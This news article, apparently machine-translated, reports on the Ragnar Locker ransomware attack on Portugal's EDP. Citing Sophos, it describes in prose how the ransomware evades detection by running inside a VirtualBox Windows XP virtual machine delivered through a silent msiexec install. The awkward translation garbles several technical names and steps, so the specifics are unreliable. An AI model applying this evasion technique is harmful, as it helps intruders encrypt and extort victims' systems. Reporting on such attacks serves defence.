Ragnar Locker, the ransomware disguised as a kind of virtual machine
It should be remembered for all intents and purposes that during the month of April, the Portuguese energy company, EDP, was hit by a ransom programme.
The direct consequence of this cyberattack was the theft of more than 10TB of sensitive information. The malware used to perform this task is referred to as Ragnar Locker. This ransom program has a very special feature. Its user can deploy it by camouflage it in the form of a virtual machine.
This article will also interest you: Ransomware: Snake, the new enemy of factories
Sophos, a cybersecurity company, has identified 8 steps to analyze the first causes to link a cyber-malware operation to the Ragnar Locker program. The security solutions provider describes how this ransom program manages to camouflage itself and go unnoticed. In a blog post, Sophos tells us: "In a recently detected attack, the Ragnar Locker ransomware was deployed in a Virtual Oracle VirtualBox Windows XP machine. The payload of the attack was a 122MB installation program with a 282MB virtual image inside, all to hide a 49K ransomware executable. This does work because Energias de Portugal, the Portuguese energy giant, has been a victim of this malware.Cyber criminals demanded a ransom of $11 million, or 1,580 bitcoins, at the time.
Before this computer attack of significant magnitude, hackers who use Ragnar Locker, used to use connection going through the Windows RDP. In this way, they could compromise network security and break into the system to gather information. To successfully intrusion, they granted themselves administrator privileges, using some command and tools such as GPO and Powershell: "In the detected attack, Ragnar Locker actors used a GPO task to run Microsoft Installer (msiexec.exe), by switching settings to silently download and install a 122MB MSI package designed and unsigned from a remote web server." , says the computer security firm.
In more detail, it should be noted that "the malicious package is thus articulated around a functional installation of an old Oracle VirtualBox hypervisor (Sun xVM VirtualBox v3.0.4 dated August 5, 2009) coupled with a micro.vdi virtual disk image file (an image of a redacted version of Windows XP SP3 called MicroXP v0.82 embeding the executable ragnar locker. explains Dominique Filippone, a journalist. Once the packaging is copied into the "VirtualAppliances" directory of the x86 program files, this malware deploys an executable (va.exe), a batch file (install.bat) and some support files. He adds. For its part, solutions provider Sophos notes: "The MSI installation program runs.exe, which in turn executes the set script.bat. The first task of the script is to record and run the VirtualBox VBoxC.dll and VBoxRT app extensions.dll needed, as well as the VirtualBox VboxDrv driver.sys: ".
When the software is permanently installed in the targeted computer system or network, the strategy used by cyber criminals will be to phase out certain notification features such as Windows AutoPlay. Next, place an order that will erase all the hidden contents of the targeted terminal so as to prevent any attempt to restore documents that are not encrypted. In addition, the program will be used to identify hard drives implanted in the system or terminal, all-weather mapping network drives on physical terminals to set them up, and facilitate their access from the virtual machine. "The virtual machine is configured with 256MB of RAM, 1 CPU, a single 299MB micro.vdi HDD file and an Intel PRO/1000 network card connected to the NAT," Sophos said. From there, cyber criminals can encrypt the files, thus taking hostages in the system. "Because the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unimpeded because they are out of reach of security software on the physical host machine. Data on discs and drives accessible on the physical machine is attacked by the legitimate VboxHeadless.exe, VirtualBox virtualization software," explains the cybersecurity firm.
Now access an unlimited number of passwords: